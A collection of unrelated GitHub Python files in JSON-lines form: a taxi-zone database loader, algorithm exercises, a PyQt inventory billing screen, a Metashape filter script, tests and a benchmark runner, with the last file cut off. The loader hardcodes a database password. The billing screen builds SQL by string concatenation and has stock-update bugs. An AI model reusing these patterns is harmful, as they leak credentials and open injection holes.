+{"seq_id":"24840983428","text":"## import taxi zone info to database, source : https://s3.amazonaws.com/nyc-tlc/misc/taxi+_zone_lookup.csv\n\nimport csv\nimport psycopg2\nfrom psycopg2 import Error\n\nimport datetime\nfrom datetime import datetime\n\n\nconn = psycopg2.connect(host=\"10.0.0.10\",database=\"db_psql_taxi\", user=\"jelov\", password=\"jelov_psql_pwd\")\n\ncur = conn.cursor()\n\ncur.execute(\"CREATE TABLE taxiZoneInfo (ZoneId integer PRIMARY KEY, Borough text, Zone_Name text, service_zone text);\") #only create once\n\nwith open('taxi_zone_lookup.csv','r') as f:\n reader=csv.reader(f)\n next(reader)\n for row in reader:\n cur.execute(\n \"INSERT INTO taxiZoneInfo VALUES (%s, %s, %s, %s)\",\n row\n )\n print(row)\n\ncur.execute(\"SELECT * FROM taxiZoneInfo;\")\ncur.fetchone()\n\nconn.commit()\ncur.close()\nconn.close()\n\n","repo_name":"JelovXCMS/TaxiForNextRide","sub_path":"miscellaneous/addZoneInfo.py","file_name":"addZoneInfo.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15193618532","text":"# we have f(i) = A[i] >= i. It is False, False, False, then it starts to be always True,\n# this is the definition of dichotomie\n\ndef magic_index(a):\n def f(x):\n return a[x] >= x\n i = 0\n j = len(a) - 1\n while j-i != 0:\n h = (j+i) >> 1\n if f(h):\n # we know magic index is between i and h (included)\n j = h\n else:\n # we know magic index is between h+1 and j\n i = h+1\n if a[j] == j:\n return j\n return None\n","repo_name":"piochelepiotr/crackingTheCode","sub_path":"chp8/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2700502646","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom dao import Connections\nfrom utilities import *\nimport datetime\nfrom screens import LoginScreen\nimport sys\n\nclass BillScreen(QWidget):\n def __init__(self,uname=None):\n super().__init__()\n self.username = uname\n print(self.username)\n\n self.PrepareScreen()\n\n def PrepareScreen(self):\n self.ptotal = 0\n self.itemnum = 0\n self.ProductList=list()\n self.brand_records=list()\n self.cat_records = list()\n self.subcat_records = list()\n self.item_records = list()\n self.cust_records=list()\n grid=QGridLayout()\n self.setGeometry(50,50,1500,1000)\n self.setWindowTitle(\"Bill Screen\")\n newfont = QFont(\"Bell MT\", 18, QFont.Bold)\n self.rboldcust=QRadioButton(\"Old Customer\")\n self.rbnewcust = QRadioButton(\"New Customer\")\n\n lblcust=QLabel(\"New Customer Details\")\n lblcustname=QLabel(\"Customer Name\")\n lblcontact=QLabel(\"Contact No.\")\n lblemail=QLabel(\"Email Id\")\n lbladd=QLabel(\"Address\")\n lblbid=QLabel(\"Choose BrandID\")\n lblcid = QLabel(\"Choose CatID\")\n lblid = QLabel(\"Choose ItemID\")\n lblcustid=QLabel(\"Choose CustomerID\")\n lblsubid=QLabel(\"Choose SubCat ID\")\n lblitemno=QLabel(\"Items\")\n lbltotal=QLabel(\"Pay\")\n lbloldcontact=QLabel(\"Contact\")\n lblpaid=QLabel(\"Amount Paid\")\n\n\n lblcust.setFont(newfont)\n lblcustname.setFont(newfont)\n lblcontact.setFont(newfont)\n lbloldcontact.setFont(newfont)\n lblemail.setFont(newfont)\n lbladd.setFont(newfont)\n lblcid.setFont(newfont)\n lblbid.setFont(newfont)\n lblid.setFont(newfont)\n lblpaid.setFont(newfont)\n lblcustid.setFont(newfont)\n lblsubid.setFont(newfont)\n lblitemno.setFont(newfont)\n lbltotal.setFont(newfont)\n self.rboldcust.setFont(newfont)\n self.rbnewcust.setFont(newfont)\n\n lblamount=QLabel(\"Amount\")\n self.amount=QLineEdit()\n self.paidEdit=QLineEdit()\n self.itemno=QLabel()\n self.total=QLabel()\n self.oldcontactEdit=QLineEdit()\n self.total.setStyleSheet(\"color:red\")\n self.itemno.setStyleSheet(\"color:BLUE\")\n lblamount.setFont(newfont)\n self.amount.setFont(newfont)\n\n self.custnameEdit=QLineEdit()\n self.contactEdit=QLineEdit()\n self.paidEdit.setFont(newfont)\n self.emailEdit=QLineEdit()\n self.addEdit=QLineEdit()\n self.custidcombo=QComboBox()\n self.brandidcombo=QComboBox()\n self.catidcombo=QComboBox()\n self.subcatidcombo=QComboBox()\n self.itemidcombo=QComboBox()\n self.tableWidget=QTableWidget()\n\n lblqty = QLabel(\"Qty\")\n self.qtyEdit = QLineEdit()\n self.qtyEdit.setToolTip(\"enter qty\")\n self.btn = QPushButton(\"ADD Product\")\n self.btngenerate=QPushButton(\"Generate Bill\")\n lblqty.setFont(newfont)\n self.qtyEdit.setFont(newfont)\n self.addEdit.setFont(newfont)\n self.paidEdit.setFont(newfont)\n self.custnameEdit.setFont(newfont)\n self.contactEdit.setFont(newfont)\n self.emailEdit.setFont(newfont)\n self.custidcombo.setFont(newfont)\n self.brandidcombo.setFont(newfont)\n self.catidcombo.setFont(newfont)\n self.itemidcombo.setFont(newfont)\n self.subcatidcombo.setFont(newfont)\n self.btn.setFont(newfont)\n self.btngenerate.setFont(newfont)\n self.total.setFont(newfont)\n self.itemno.setFont(newfont)\n self.oldcontactEdit.setFont(newfont)\n\n #For making all the widgets inactive initially\n self.custnameEdit.setEnabled(False)\n self.contactEdit.setEnabled(False)\n self.emailEdit.setEnabled(False)\n self.addEdit.setEnabled(False)\n self.custidcombo.setEnabled(False)\n\n\n #Positioning of widgets\n grid.addWidget(self.rboldcust,1,0,1,2)\n grid.addWidget(self.rbnewcust, 1,4,1,2)\n\n grid.addWidget(lblcustid,2,0,1,2)\n grid.addWidget(self.custidcombo,2,2,1,2)\n\n grid.addWidget(lbloldcontact, 3, 0, 1, 2)\n grid.addWidget(self.oldcontactEdit, 3, 2, 1, 2)\n\n grid.addWidget(lblcust,2,4,1,2)\n grid.addWidget(lblcustname,3,4,1,2)\n\n grid.addWidget(self.custnameEdit,3,6,1,2)\n grid.addWidget(lblcontact,4,4,1,2)\n grid.addWidget(self.contactEdit,4,6,1,2)\n grid.addWidget(lblemail,5,4,1,1)\n grid.addWidget(self.emailEdit,5,6,1,2)\n\n\n grid.addWidget(lbladd,6,4,1,1)\n grid.addWidget(self.addEdit,6,6,1,2)\n grid.addWidget(lblbid,7,0,1,2)\n grid.addWidget(self.brandidcombo,7,2,1,2)\n grid.addWidget(lblsubid, 7, 4, 1, 2)\n grid.addWidget(self.subcatidcombo, 7, 6, 1, 2)\n grid.addWidget(lblcid, 8, 0,1,2)\n grid.addWidget(self.catidcombo, 8, 2,1,2)\n\n grid.addWidget(lblid, 8,4,1,2 )\n grid.addWidget(self.itemidcombo, 8, 6,1,2)\n grid.addWidget(lblpaid, 8, 8, 1, 1)\n grid.addWidget(self.paidEdit, 8, 9, 1, 2)\n grid.addWidget(lblqty,9,0,1,2)\n grid.addWidget(self.qtyEdit,9,2,1,2)\n grid.addWidget(lblitemno, 9, 4, 1, 1)\n grid.addWidget(self.itemno, 9, 5, 1, 1)\n grid.addWidget(lbltotal, 9, 6, 1, 1)\n grid.addWidget(self.total, 9, 7, 1, 1)\n grid.addWidget(self.btn, 9, 8, 1, 1)\n grid.addWidget(self.btngenerate, 9, 9, 1, 2)\n\n grid.addWidget(self.tableWidget,10,0,1,15)\n self.custidcombo.addItem(\"Choose CustomerID\")\n self.brandidcombo.addItem(\"BrandID\")\n self.catidcombo.addItem(\"CategoryID\")\n self.ComboFunc()\n # To make one of of the radiobutton actions active at a time\n self.rboldcust.toggled.connect(self.OldCustomer)\n self.rbnewcust.toggled.connect(self.NewCustomer)\n self.btn.clicked.connect(self.AddProduct)\n self.tableWidget.setContextMenuPolicy(Qt.ActionsContextMenu)\n deleteAction = QAction(\"Delete Record\", self.tableWidget)\n\n self.tableWidget.addAction(deleteAction)\n\n\n\n deleteAction.triggered.connect(self.DeleteRecord)\n\n self.btngenerate.clicked.connect(self.GenerateBill)\n\n self.setLayout(grid)\n\n #self.show()\n def OldCustomer(self,enabled):\n try:\n self.custidcombo.setEnabled(enabled)\n self.PrepareCustcombo()\n self.custidcombo.currentTextChanged.connect(self.ChangeCombo)\n self.catidcombo.currentIndexChanged.connect(self.CatChange)\n self.subcatidcombo.currentIndexChanged.connect(self.SubCatChange)\n except BaseException as ex:\n print(ex)\n\n def ChangeCombo(self):\n try:\n index = self.custidcombo.currentIndex()\n if index > 0 and (index - 1) <= len(self.cust_records):\n\n record = self.cust_records[index - 1]\n\n self.oldcontactEdit.setText(record[2])\n else:\n self.oldcontactEdit.setText(\"\")\n except BaseException as ex:\n print(ex)\n\n def NewCustomer(self, enabled):\n try:\n\n self.custnameEdit.setEnabled(enabled)\n self.contactEdit.setEnabled(enabled)\n self.emailEdit.setEnabled(enabled)\n self.addEdit.setEnabled(enabled)\n\n self.catidcombo.currentIndexChanged.connect(self.CatChange)\n self.subcatidcombo.currentIndexChanged.connect(self.SubCatChange)\n\n\n except BaseException as ex:\n print(ex)\n\n\n\n\n def CatChange(self, index):\n try:\n\n self.subcatidcombo.clear()\n\n self.subcatidcombo.addItem(\"SubCatID\")\n\n value=self.cat_records[index-1]\n\n\n con = Connections.Connection()\n\n query = \"select SubcategoryId,SubCategoryName from subcategoryinfo where CategoryId=\"+str(value[0])\n\n self.subcat_records = con.ExecuteQuery(query)\n\n for record in self.subcat_records:\n value = record[1] + \"(\" + str(record[0]) + \")\"\n self.subcatidcombo.addItem(value)\n except BaseException as ex:\n print(ex)\n\n\n def SubCatChange(self, index):\n try:\n self.itemidcombo.clear()\n self.itemidcombo.addItem(\"ItemID\")\n value=self.subcat_records[index-1]\n subcat=value[0]\n\n con = Connections.Connection()\n\n query = \"select ItemId,ItemName,Price,AvailableQty from iteminfo where SubCategoryId=\" + str(value[0])\n\n self.item_records = con.ExecuteQuery(query)\n\n for record in self.item_records:\n value = record[1] + \"(\" + str(record[0]) + \")\"\n self.itemidcombo.addItem(value)\n except BaseException as ex:\n print(ex)\n\n def PrepareCombo(self):\n con=Connections.Connection()\n table_name=\"brandinfo\"\n column_values=(\"BrandId\",\"BrandName\")\n query=con.CreateSelectQuery(column_values,table_name)\n #print(query)\n self.brand_records=con.ExecuteQuery(query)\n\n for record in self.brand_records:\n value=record[1]+\"(\"+str(record[0])+\")\"\n self.brandidcombo.addItem(value)\n\n\n table_name = \"categoryinfo\"\n column_values = (\"CategoryId\", \"CategoryName\")\n query = con.CreateSelectQuery(column_values, table_name)\n #print(query)\n self.cat_records = con.ExecuteQuery(query)\n #print(self.cat_records)\n for record in self.cat_records:\n value = record[1] + \"(\" + str(record[0]) + \")\"\n self.catidcombo.addItem(value)\n\n def PrepareCustcombo(self):\n con=Connections.Connection()\n table_name=\"customerinfo\"\n column_values=(\"CustomerId\",\"CustomerName,contact\")\n query=con.CreateSelectQuery(column_values,table_name)\n self.cust_records=con.ExecuteQuery(query)\n if self.cust_records is not None:\n for record in self.cust_records:\n value=str(record[1])+\" (\"+ str(record[0])+\")\"\n self.custidcombo.addItem(value)\n\n def AddProduct(self):\n try:\n message=\"\"\n\n bid=self.brandidcombo.currentIndex()\n\n record=self.brand_records[bid-1]\n brand=record[1]\n\n\n\n cid = self.catidcombo.currentIndex()\n record = self.cat_records[cid - 1]\n category = record[1]\n\n subcatid = self.subcatidcombo.currentIndex()\n record = self.subcat_records[subcatid - 1]\n subcat = record[1]\n\n itemid = self.itemidcombo.currentIndex()\n\n record = self.item_records[itemid - 1]\n itemId=record[0]\n item = record[1]\n\n price = int(record[2])\n qty = self.qtyEdit.text()\n qt = 0\n\n if self.ProductList is not None:\n for record in self.ProductList:\n if record[7] == itemId:\n qt += int(record[4])\n\n\n Qty=int(qty) + qt\n\n if itemId is not None:\n con=Connections.Connection()\n query=\"select AvailableQty from iteminfo where itemid = \"+str(itemId)\n\n self.itemqty=con.ExecuteQuery(query)\n\n if self.itemqty[0][0]>= Qty:\n self.diff=self.itemqty[0][0]-Qty\n\n if IsEmpty(brand):\n message+=\"Select Brand\\n\\n\"\n\n if IsEmpty(category):\n message+=\"Select Category\\n\\n\"\n\n if IsEmpty(subcat):\n message+=\"Select SubCategory\\n\\n\"\n\n if IsEmpty(item):\n message+=\"Select Item\\n\\n\"\n if IsEmpty(qty):\n message += \"Enter Quantity\\n\\n\"\n elif not IsFloat(qty) or not IsNumber(qty):\n message += \"Enter Quantity In digits\\n\\n\"\n\n subtotal=price*int(qty)\n\n #It will send all the values of a particular item to product List\n self.value=(item,brand,category,subcat,qty,price,subtotal,itemId)\n\n self.ProductList.append(self.value)\n self.ptotal+=int(subtotal)\n self.itemnum+=int(qty)\n\n\n self.itemno.setText(str(self.itemnum))\n self.total.setText(str(self.ptotal))\n\n\n self.PrepareTable()\n message=\"Item Added\"\n\n else:\n self.diff=Qty-self.itemqty[0][0]\n message=\"Demand is Out of Range\\n\\nShortage= \"+ str(self.diff)\n else:\n message=\"Select Item\"\n ShowMessageDialog(self,message)\n except BaseException as ex:\n print(ex)\n def PrepareTable(self):\n column_values=(\"ItemName\",\"BrandName\",\"CategoryName\",\"SubcategoryName\",\"Qty\",\"Price\",\"Sub-Total\")\n self.tableWidget.setColumnCount(7)\n self.tableWidget.setHorizontalHeaderLabels(column_values)\n row=0\n if len(self.ProductList)>0:\n self.tableWidget.setRowCount(len(self.ProductList))\n for record in self.ProductList:\n self.tableWidget.setItem(row,0,QTableWidgetItem(record[0]))\n self.tableWidget.setItem(row, 1, QTableWidgetItem(record[1]))\n self.tableWidget.setItem(row, 2, QTableWidgetItem(record[2]))\n self.tableWidget.setItem(row, 3, QTableWidgetItem(record[3]))\n self.tableWidget.setItem(row, 4, QTableWidgetItem(str(record[4])))\n self.tableWidget.setItem(row, 5, QTableWidgetItem(str(record[5])))\n self.tableWidget.setItem(row, 6, QTableWidgetItem(str(record[6])))\n\n row+=1\n\n\n def ComboFunc(self):\n self.PrepareCombo()\n\n\n def DeleteRecord(self):\n try:\n message = \"\"\n srow = self.tableWidget.currentRow()\n bid = self.tableWidget.item(srow, 0).text()\n qty = self.tableWidget.item(srow, 4).text()\n price = self.tableWidget.item(srow, 5).text()\n del(self.ProductList[srow])\n self.tableWidget.removeRow(self.tableWidget.currentRow())\n self.itemnum-=int(qty)\n self.ptotal-=float(price)\n self.itemno.setText(str(self.itemnum))\n self.total.setText(str(self.ptotal))\n except BaseException as ex:\n print(ex)\n\n def GenerateBill(self):\n #print(\"cash\")\n try:\n\n\n if self.rboldcust.isChecked():\n message=\" \"\n con=Connections.Connection()\n custid=self.custidcombo.currentIndex()\n cust_record=self.cust_records[custid-1]\n customerid=cust_record[0]\n Date = datetime.datetime.now()\n EntryDate = Date.date()\n pay=\"cash\"\n\n table_bname='billinfo'\n column_bvalues={\"CustomerId\":str(custid),\"BillDate\":str(EntryDate),\"UserName\":str(self.username),\"PaymentDescription\":str(pay)}\n query=con.CreateInsertQuery(table_bname,column_bvalues)\n print(query)\n if con.InsertQuery(query):\n query='select last_insert_id()'\n billid=con.ExecuteQuery(query)\n\n for products in self.ProductList:\n table_billdetail = \"billdetails\"\n column_bdetailvalues = {\"BillId\": str(billid[0][0]), \"ItemId\":str(products[7]),\"Qty\":str(products[4]),\"Price\":str(products[5])}\n query=con.CreateInsertQuery(table_billdetail,column_bdetailvalues)\n if con.InsertQuery(query):\n query=\"update iteminfo set AvailableQty=\"+ str(self.diff)\n query+=\" where ItemId= \"+str(products[7])\n\n\n if con.InsertQuery(query):\n message = \"Bill genertaed successfully\"\n ShowMessageDialog(self,message)\n\n self.Dialog()\n\n else:\n message=\"Failure Due To: \"+ con.GetErrorMessage()\n\n\n elif self.rbnewcust.isChecked():\n try:\n message=\"\"\n allvalid=True\n cname=self.custnameEdit.text()\n contact=self.contactEdit.text()\n email=self.emailEdit.text()\n add=self.addEdit.text()\n if IsEmpty(cname) or IsEmpty(contact) or IsEmpty(add):\n message=\"Enter all fields(name,contact,address)\\n\\n\"\n allvalid=False\n if IsEmpty(self.paidEdit):\n message=\"Enter amount to be paid\"\n allvalid=False\n if not IsAlphabet(cname):\n message+=\"Enter valid Name\\n\\n\"\n allvalid=False\n if not ValidContact(contact):\n message+=\"Enter a valid contact\\n\\n\"\n allvalid=False\n\n if len(self.ProductList)<=0:\n message+=\"Select the items to be purchased\\n\\n\"\n allvalid=False\n\n if allvalid==True:\n con=Connections.Connection()\n table_name=\"customerinfo\"\n column_values={\"CustomerName\":cname,\"contact\":str(contact),\"EmailId\":str(email),\"Address\":add}\n query=con.CreateInsertQuery(table_name,column_values)\n\n if con.InsertQuery(query):\n\n query='select last_insert_id()'\n self.custId=con.ExecuteQuery(query)\n uname=self.username\n pay=\"cash\"\n Date = datetime.datetime.now()\n EntryDate = Date.date()\n table_bname = 'billinfo'\n column_bvalues = {\"CustomerId\": str(self.custId[0][0]), \"BillDate\": str(EntryDate), \"UserName\": uname,\n \"PaymentDescription\": pay}\n query = con.CreateInsertQuery(table_bname, column_bvalues)\n if con.InsertQuery(query):\n query = 'select last_insert_id()'\n billid = con.ExecuteQuery(query)\n print(billid)\n print(self.ProductList)\n\n for products in self.ProductList:\n table_billdetail = \"billdetails\"\n column_bdetailvalues = {\"BillId\": str(billid[0][0]), \"ItemId\": str(products[7]),\n \"Qty\": str(products[4]), \"Price\": str(products[5])}\n query = con.CreateInsertQuery(table_billdetail, column_bdetailvalues)\n print(query)\n if con.InsertQuery(query):\n query = \"update iteminfo set AvailableQty=\" + str(self.diff)\n query += \"where ItemId= \" + str(products[7])\n con.InsertQuery(query)\n message=\"Bill generated successfully\"\n else:\n message = \"Failure Due To: \" + con.GetErrorMessage()\n else:\n message=\"Failure due to: \"+ con.GetErrorMessage()\n\n\n except BaseException as ex:\n print(ex)\n ShowMessageDialog(self,message)\n\n self.Dialog()\n\n\n except BaseException as ex:\n print(ex)\n\n def Dialog(self):\n try:\n\n\n\n #self.setStyleSheet(\"Font-Family:Bell MT;Font-Size:25px;Font-weight: Bold\")\n paid = self.paidEdit.text()\n amt = self.ptotal\n bal = float(paid) - amt\n\n balance = \"Balance : \" + str(bal)\n\n ShowMessageDialog(self,balance)\n\n except BaseException as ex:\n print(ex)","repo_name":"akshitagarg15/IMS_GUI","sub_path":"inventory_data/screens/BillScreen.py","file_name":"BillScreen.py","file_ext":"py","file_size_in_byte":20515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14428838016","text":"def get_sum(num_one, num_two):\n try:\n sum_number = int(num_one) + int(num_two)\n print(sum_number)\n except ValueError:\n print('Кек. Введите другой тип данных')\n\n\nget_sum(3, 5)\n\n\n\n\n\n\n\n","repo_name":"Vlad-Bryu/Home_work","sub_path":"after_1_lesson/exception2task.py","file_name":"exception2task.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13359802591","text":"with open(\"aoc6.txt\", 'r', encoding=\"utf8\") as f:\n data = f.read()\n\ny = data.split(\"\\n\\n\") #split data into groups - still have /n inside\ncount_uniq = 0\nfinal_count = 0\n\n# Part 1:\n# for x in y: # loop through groups\n# uniq_list = []\n# z = x.split(\"\\n\") #split eaceh group into mini list\n#\n# all = (''.join(map(str, z))) #combine list items together\n#\n# for a in range(0,len(all)):\n# if all[a] not in uniq_list:\n# uniq_list.append(all[a])\n#\n# count_uniq = len(uniq_list)\n# final_count += count_uniq\n# uniq_list = []\n#\n# print(final_count)\n\n# Part 2:\nfor x in y: # loop through groups\n uniq_list = []\n z = x.split(\"\\n\") #split eaceh group into mini list\n mydict = {}\n count_uniq = 0\n group_size = len(z)\n\n for a in z:\n for b in range(0,len(a)):\n if a[b] in mydict:\n mydict[a[b]] += 1\n else:\n mydict[a[b]] = 1\n\n for key, value in mydict.items():\n if value == group_size:\n count_uniq += 1\n\n final_count += count_uniq\n\nprint(final_count)","repo_name":"adambatchelor2/python","sub_path":"adventofCode_day6.py","file_name":"adventofCode_day6.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22886426735","text":"## Two Sum\n# Given an array of integers nums and an integer target, return indices of the two numbers such that they add up to target.\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n numsDict = dict()\n for index, element in enumerate(nums):\n if f\"{element}\" in numsDict:\n numsDict[f\"{element}\"].append(index)\n else:\n numsDict[f\"{element}\"] = [index]\n \n for index, element in enumerate(nums):\n diff = f\"{(target - element)}\"\n if diff in numsDict:\n if target - element == element:\n if len(numsDict[diff]) > 1:\n return [\n numsDict[f\"{element}\"][0],\n numsDict[f\"{element}\"][1]\n ]\n else:\n return [\n numsDict[f\"{target - element}\"][0], \n numsDict[f\"{element}\"][0]\n ]","repo_name":"henriqueconte/Challenges","sub_path":"LeetCode/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22102243411","text":"import Metashape\nimport sys\n\n\"\"\"\nMetashape Point Cloud Filter by Confidence (v 0.1)\nJules Fleury, SIGéo/CEREGE/AMU\nUsage:\nTools -> Run script\nIn the row \"Arguments\" enter the maximum confidence level to cut\nex: 3\nThe script will then select and remove all points in the confidence level [0,3]\nor leave the \"Arguments\" line blank, in which case the default value will be used.\n\"\"\"\n\ndef_maxconf = 3\n\nif len(sys.argv) == 2:\n\tmaxconf = int(sys.argv[1])\n\tprint(\"Using max confidence value from user argument \" + str(maxconf) + \"\\n\")\nelse:\n\tmaxconf = def_maxconf\n\tprint(\"Using max confidence value from default value \" + str(maxconf) + \"\\n\")\n\n\ndef filter_point_cloud(chunk, maxconf):\n\tchunk.point_cloud.setConfidenceFilter(0, maxconf) # configuring point cloud filter so that only point with low-confidence currently active\n\tall_points_classes = list(range(128))\n\tchunk.point_cloud.removePoints(all_points_classes) # removes all active points of the point cloud, i.e. removing all low-confidence points\n\tchunk.point_cloud.resetFilters() # resetting filter, so that all other points (i.e. high-confidence points) are now active\n\n\nfor chunk in Metashape.app.document.chunks:\n\tprint(\"Processing chunk \" + chunk.label + \"...\")\n\tfilter_point_cloud(chunk, maxconf)\n","repo_name":"agisoft-llc/metashape-scripts","sub_path":"src/contrib/filter_point_cloud_confidence.py","file_name":"filter_point_cloud_confidence.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":292,"dataset":"github-code","pt":"37"} +{"seq_id":"21672752530","text":"__author__ = 'kpy@google.com (Ka-Ping Yee)'\n\nimport webapp2\nimport webob\n\nimport config\nimport domains\nimport test_utils\n\n\nclass IndexTest(test_utils.BaseTest):\n \"\"\"Tests for the Index request handler.\"\"\"\n\n def testRedirectWithCrisisParam(self):\n \"\"\"Tests GetDestination with old-style id= and crisis= parameters.\"\"\"\n self.assertEquals(\n 'http://app.com/root/abc?layers=def',\n self.DoGet('/?id=abc&layers=def', 302).headers['Location'])\n self.assertEquals(\n 'http://app.com/root/abc?layers=def',\n self.DoGet('/?crisis=abc&layers=def', 302).headers['Location'])\n\n def testRedirectDefault(self):\n \"\"\"Tests GetDestination with no label parameter.\"\"\"\n self.assertEquals('http://app.com/root/empty',\n self.DoGet('', 302).headers['Location'])\n\n self.assertEquals('http://app.com/root/empty?layers=x',\n self.DoGet('/?layers=x', 302).headers['Location'])\n\n with test_utils.RootLogin():\n domains.Domain.Put('xyz.com', default_label='qwerty')\n self.assertEquals('http://app.com/root/qwerty?layers=x',\n self.DoGet('/?layers=x', 302).headers['Location'])\n\n with test_utils.RootLogin():\n domains.Domain.Put('foo.org', default_label='fancy-label')\n response = self.DoGet('/foo.org/?layers=x', 302)\n self.assertEquals('http://app.com/root/foo.org/fancy-label?layers=x',\n response.headers['Location'])\n\n\nif __name__ == '__main__':\n test_utils.main()\n","repo_name":"googlearchive/googlecrisismap","sub_path":"index_test.py","file_name":"index_test.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"37"} +{"seq_id":"42575663937","text":"import subprocess\nfrom tqdm import tqdm\nimport os\nimport yaml\n\n\ndef experiment(cfg, fw, bk):\n\n for backend, conf in bk['BACKENDS'].items():\n print(fw, backend)\n final_dir = os.path.join(cfg['RESULT_DIR'], f\"{fw}_{backend}\")\n os.makedirs(final_dir, exist_ok=True)\n with open(os.path.join(final_dir, f\"{cfg['SCENARIO']}_{cfg['n']}_{cfg['N']}_{conf['T']}.txt\"), \"w\") as f:\n for i in tqdm(range(conf['T'])):\n stdout = subprocess.run([bk['CMD']] + list(map(str, conf['ARGS'])), stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout\n res = float(str(stdout)[2:-3])\n f.write(str(res) + \"\\n\")\n\n # n = n*2 - 1\n\n # if framework == \"AF\":\n # if backend not in [\"OPENCL_GPU\", \"CUDA\"]:\n # print(\"NOT SUPPORTED BACKEND\")\n # return\n # cmd = \"./src/arrayfire/build/main\"\n # init_file = os.path.join(\"init_states\", f\"explosion_{n}.af\")\n # arguments = [str(n), str(N), init_file, backend]\n # final_dir = os.path.join(results_dir, f\"AF_{backend}\")\n # os.makedirs(final_dir, exist_ok=True)\n # with open(os.path.join(final_dir, f\"exp_{n}_{N}_{times}.txt\"), \"w\") as f:\n # for i in tqdm(range(times)):\n # stdout = subprocess.run([cmd] + arguments, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout\n # res = float(str(stdout)[2:-3])\n # f.write(str(res) + \"\\n\")\n\n # if framework == \"CPP\":\n # cmd = \"./src/cpp/main\"\n # init_file = os.path.join(\"init_states\", f\"explosion_{n}.txt\")\n # if backend not in [\"CPU\"]:\n # print(\"NOT SUPPORTED BACKEND\")\n # return\n # arguments = [str(n), str(N), \"8\", init_file]\n # final_dir = os.path.join(results_dir, f\"CPP_{backend}\")\n # os.makedirs(final_dir, exist_ok=True)\n # with open(os.path.join(final_dir, f\"exp_{n}_{N}_{times}.txt\"), \"w\") as f:\n # for i in tqdm(range(times)):\n # stdout = subprocess.run([cmd] + arguments, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout\n # res = float(str(stdout)[2:-3])\n # f.write(str(res) + \"\\n\")\n\n\n # if framework == \"PYTORCH\":\n # if backend not in [\"CPU\", \"CUDA\"]:\n # print(\"NOT SUPPORTED BACKEND\")\n # return\n # cmd = \"./src/python/torch_3D.py\"\n # init_file = os.path.join(\"init_states\", f\"explosion_{n}.txt\")\n # arguments = [str(n), str(N), init_file, backend]\n # final_dir = os.path.join(results_dir, f\"PYTORCH_{backend}\")\n # os.makedirs(final_dir, exist_ok=True)\n # with open(os.path.join(final_dir, f\"exp_{n}_{N}_{times}.txt\"), \"w\") as f:\n # for i in tqdm(range(times)):\n # stdout = subprocess.run([cmd] + arguments, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout\n # res = float(str(stdout)[2:-3])\n # f.write(str(res) + \"\\n\")\n\n\n # if framework == \"MPI\":\n # if backend not in [\"CPU\", \"OPENCL_GPU\", \"CUDA\", \"OPENCL_GPU_2\", \"CUDA_2\"]:\n # print(\"NOT SUPPORTED BACKEND\")\n # return\n # cmd = [\"/usr/bin/mpirun\"]\n # if backend == \"CPU\":\n # np = 1\n # elif backend in [\"OPENCL_GPU\", \"CUDA\"]:\n # np = 1\n # else:\n # np = 2\n # arguments = [\"-np\", str(np), \"src/mpi/build/mpi_app\" ,str(n), str(N), backend]\n # final_dir = os.path.join(results_dir, f\"MPI_{backend}\")\n # os.makedirs(final_dir, exist_ok=True)\n # with open(os.path.join(final_dir, f\"exp_{n}_{N}_{times}.txt\"), \"w\") as f:\n # for i in tqdm(range(times)):\n # print(cmd + arguments)\n # stdout = subprocess.run(cmd + arguments, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout\n # res = float(str(stdout)[2:-3])\n # f.write(str(res) + \"\\n\")\n\nif __name__ == \"__main__\":\n\n def join(loader, node):\n seq = loader.construct_sequence(node)\n return ''.join([str(i) for i in seq])\n def nscale(loader, node):\n seq = loader.construct_sequence(node)\n return seq[0] *2 - 1\n\n yaml.add_constructor('!join', join)\n yaml.add_constructor('!nscale', nscale)\n\n with open(\"exp_cfg.yaml\") as f:\n cfg = yaml.load(f)\n\n for fw, bk in cfg[\"FRAMEWORKS\"].items():\n if bk != None:\n try:\n experiment(cfg, fw, bk)\n except:\n continue","repo_name":"PhantomOfTheOpera/UCU_ComputationalFluidDynamics","sub_path":"exp_pipeline.py","file_name":"exp_pipeline.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35412820551","text":"#!/usr/bin/env python3\n\"\"\"\n Derivative function\n\"\"\"\n\n\ndef poly_derivative(poly):\n \"\"\"\n Returns the derivative of the given poly\n \"\"\"\n if type(poly) is not list or len(poly) == 0:\n return None\n for i in poly:\n if type(i) is not int and type(i) is not float:\n return None\n derivative = []\n for i in range(1, len(poly)):\n derivative.append(poly[i] * i)\n if derivative == []:\n derivative.append(0)\n return derivative\n","repo_name":"IHansen225/holbertonschool-machine_learning","sub_path":"math/calculus/10-matisse.py","file_name":"10-matisse.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28123988478","text":"from django.contrib import admin\nfrom django import forms\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.utils.html import format_html\nfrom django.urls import reverse\nfrom .models import *\n\nclass UserAdminCustom(UserAdmin):\n list_display = ('email', 'first_name', 